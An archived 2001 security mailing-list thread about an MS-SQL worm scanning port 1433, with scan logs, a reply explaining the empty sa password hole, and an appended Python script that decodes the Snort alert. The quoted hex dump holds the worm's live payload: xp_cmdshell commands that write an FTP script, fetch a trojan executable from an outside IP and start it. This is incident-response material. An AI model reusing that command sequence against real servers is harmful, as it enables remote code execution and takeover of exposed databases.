Re: MS-SQL Worm?

From: Arthur Donkers (A.Donkersat_private)
Date: Tue Nov 20 2001 - 08:40:02 PST


    Hi,
    
    This is an exploit for a default MS SQL installation. If you check your
    trace it calls xp_cmdshell (which enables anyone to run a DOS command
    directly from MSSQL, much like 'system' under Unix). It FTPs a trojan
    from foo.com (dnsservice.exe) and executes it (after glancing through
    your log).
    
    You probably have a default MSSQL 7 installation with TCP/IP
    connectivity that has an sa account with an empty password.
    
    Better disconnect and clean up.
    
    Arthur
    
    ----- Original Message -----
    From: "Douglas P. Brown" <dugbrownat_private>
    To: <incidentsat_private>; <unisogat_private>
    Cc: "ITS Security" <securityat_private>
    Sent: Tuesday, November 20, 2001 3:54 PM
    Subject: MS-SQL Worm?
    
    
    >
    > We saw a scan come in looking for systems answering on 1433, and
    > immediately saw several systems start scanning out for other systems
    > answering on 1433 - worm behavior?  Has anyone else seen this?
    >
    > thanks,
    > -Doug
    > --
    > Douglas P. Brown
    > University of North Carolina
    > Manager of Security Resources
    > 105 Abernethy Hall
    >
    >
    > Nov 20 09:38:19 x.x.92.228:2884 -> x.x.90.70:1433 SYN ******S*
    > Nov 20 09:38:19 x.x.92.228:2886 -> x.x.92.70:1433 SYN ******S*
    > Nov 20 09:38:20 x.x.202.182:2503 -> x.x.73.109:1433 SYN ******S*
    > Nov 20 09:38:20 x.x.202.182:2507 -> x.x.77.109:1433 SYN ******S*
    > Nov 20 09:38:20 x.x.202.182:2506 -> x.x.76.109:1433 SYN ******S*
    > Nov 20 09:38:20 x.x.202.182:2528 -> x.x.96.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2904 -> x.x.110.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2905 -> x.x.111.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2906 -> x.x.112.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2907 -> x.x.113.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2909 -> x.x.115.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2908 -> x.x.114.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2910 -> x.x.116.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2911 -> x.x.117.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2913 -> x.x.119.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2912 -> x.x.118.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2915 -> x.x.121.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2914 -> x.x.120.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2916 -> x.x.122.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2917 -> x.x.123.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2532 -> x.x.99.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2533 -> x.x.100.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2535 -> x.x.102.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2538 -> x.x.105.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2539 -> x.x.106.109:1433 SYN ******S*
    >
    > [**] MS-SQL xp_cmdshell - program execution [**]
    > 11/20-08:01:48.923210 x.x.92.228:3348 -> x.x.200.115:1433
    > TCP TTL:127 TOS:0x0 ID:45385 IpLen:20 DgmLen:972 DF
    > ***AP*** Seq: 0x318F3D1  Ack: 0x1E5807AD  Win: 0x2098  TcpLen: 20
    > 03 01 03 A4 00 00 01 00 0A 00 73 00 70 00 5F 00  ..........s.p._.
    > 70 00 72 00 65 00 70 00 61 00 72 00 65 00 00 00  p.r.e.p.a.r.e...
    > 00 01 26 04 00 00 00 63 00 00 00 00 FF FF FF FF  ..&....c........
    > 00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65  ..cb...b...e.x.e
    > 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
    > 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
    > 00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E  .c.h.o. .f.t.p.>
    > 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
    > 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
    > 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
    > 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 66  . .'.e.c.h.o. .f
    > 00 6F 00 6F 00 2E 00 63 00 6F 00 6D 00 3E 00 3E  .o.o...c.o.m.>.>
    > 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
    > 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
    > 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
    > 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 62  . .'.e.c.h.o. .b
    > 00 69 00 6E 00 3E 00 3E 00 20 00 66 00 74 00 70  .i.n.>.>. .f.t.p
    > 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
    > 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
    > 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
    > 00 68 00 6F 00 20 00 63 00 64 00 20 00 70 00 75  .h.o. .c.d. .p.u
    > 00 62 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E  .b.>.>. .f.t.p..
    > 00 78 00 27 00 0A 00 65 00 78 00 65 00 63 00 20  .x.'...e.x.e.c.
    > 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68  .x.p._.c.m.d.s.h
    > 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68  .e.l.l. .'.e.c.h
    > 00 6F 00 20 00 63 00 64 00 20 00 74 00 6D 00 70  .o. .c.d. .t.m.p
    > 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
    > 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
    > 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
    > 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68 00 6F  .l.l. .'.e.c.h.o
    > 00 20 00 67 00 65 00 74 00 20 00 64 00 6E 00 73  . .g.e.t. .d.n.s
    > 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 2E  .s.e.r.v.i.c.e..
    > 00 65 00 78 00 65 00 3E 00 3E 00 20 00 66 00 74  .e.x.e.>.>. .f.t
    > 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65  .p...x.'...e.x.e
    > 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
    > 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
    > 00 63 00 68 00 6F 00 20 00 63 00 6C 00 6F 00 73  .c.h.o. .c.l.o.s
    > 00 65 00 20 00 3E 00 3E 00 20 00 66 00 74 00 70  .e. .>.>. .f.t.p
    > 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
    > 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
    > 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
    > 00 68 00 6F 00 20 00 71 00 75 00 69 00 74 00 20  .h.o. .q.u.i.t.
    > 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
    > 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
    > 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
    > 00 6C 00 6C 00 20 00 27 00 66 00 74 00 70 00 20  .l.l. .'.f.t.p.
    > 00 2D 00 73 00 3A 00 66 00 74 00 70 00 2E 00 78  .-.s.:.f.t.p...x
    > 00 20 00 32 00 30 00 37 00 2E 00 32 00 39 00 2E  . .2.0.7...2.9..
    > 00 31 00 39 00 32 00 2E 00 31 00 36 00 30 00 27  .1.9.2...1.6.0.'
    > 00 0A 00 65 00 78 00 65 00 63 00 20 00 78 00 70  ...e.x.e.c. .x.p
    > 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C  ._.c.m.d.s.h.e.l
    > 00 6C 00 20 00 27 00 64 00 65 00 6C 00 20 00 66  .l. .'.d.e.l. .f
    > 00 74 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78  .t.p...x.'...e.x
    > 00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D  .e.c. .x.p._.c.m
    > 00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27  .d.s.h.e.l.l. .'
    > 00 73 00 74 00 61 00 72 00 74 00 20 00 64 00 6E  .s.t.a.r.t. .d.n
    > 00 73 00 73 00 65 00 72 00 76 00 69 00 63 00 65  .s.s.e.r.v.i.c.e
    > 00 2E 00 65 00 78 00 65 00 27 00 0A 00 00 00 38  ...e.x.e.'.....8
    > 01 00 00 00                                      ....
    >
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    >
    
    

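The decoding a responder would do on the Snort alert quoted above, as an added example (not code from either post): rebuild the payload bytes from the hex dump and pull out the xp_cmdshell commands, taking into account that SQL Server 7 sends the batch as UCS-2, which is why the ASCII gutter shows every letter separated by a dot. SAMPLE_DUMP is a constructed subset, five lines copied from the alert, enough to carry one complete statement.

```python
# Decode the Snort payload dump of an MS-SQL (TDS, tcp/1433) packet and pull
# out the xp_cmdshell commands it carries.  Added example for this thread, not
# code from the posts.  SAMPLE_DUMP is a constructed subset: five lines copied
# from the quoted alert, just enough to hold one complete statement.
import re

SAMPLE_DUMP = """\
> 00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65  ..cb...b...e.x.e
> 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
> 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
> 00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E  .c.h.o. .f.t.p.>
> 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
"""

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
# exec xp_cmdshell '<command>'; T-SQL identifiers are case-insensitive.
XP_CMDSHELL = re.compile(r"exec\s+xp_cmdshell\s+'([^']*)'", re.IGNORECASE)


def parse_snort_hexdump(text: str) -> bytes:
    """Rebuild the raw payload from Snort's 'hex  ascii' dump lines."""
    out = bytearray()
    for line in text.splitlines():
        line = line.lstrip("> ")  # drop e-mail quote markers
        # Only the first 48 columns (16 bytes * 3) are hex; skip the ASCII gutter.
        for tok in line[:48].split():
            if HEX_BYTE.match(tok):
                out.append(int(tok, 16))
    return bytes(out)


def find_xp_cmdshell(payload: bytes) -> list[str]:
    """Return xp_cmdshell command strings found in a TDS payload.  SQL Server 7
    sends the batch as UCS-2 (UTF-16LE), so the interleaved 00 bytes defeat a
    naive ASCII match; check plain 8-bit text and both UTF-16LE alignments."""
    views = [payload.decode("latin-1")]
    for offset in (0, 1):
        views.append(payload[offset:].decode("utf-16-le", errors="replace"))
    found: list[str] = []
    for view in views:
        for cmd in XP_CMDSHELL.findall(view):
            if cmd not in found:
                found.append(cmd)
    return found


if __name__ == "__main__":
    for cmd in find_xp_cmdshell(parse_snort_hexdump(SAMPLE_DUMP)):
        print("xp_cmdshell ->", cmd)
```

Run over the full dump from the alert, the same functions recover the whole FTP script the worm writes out line by line; the UTF-16LE alignment check is what a content signature for port 1433 also has to get right.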


    This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:18:53 PST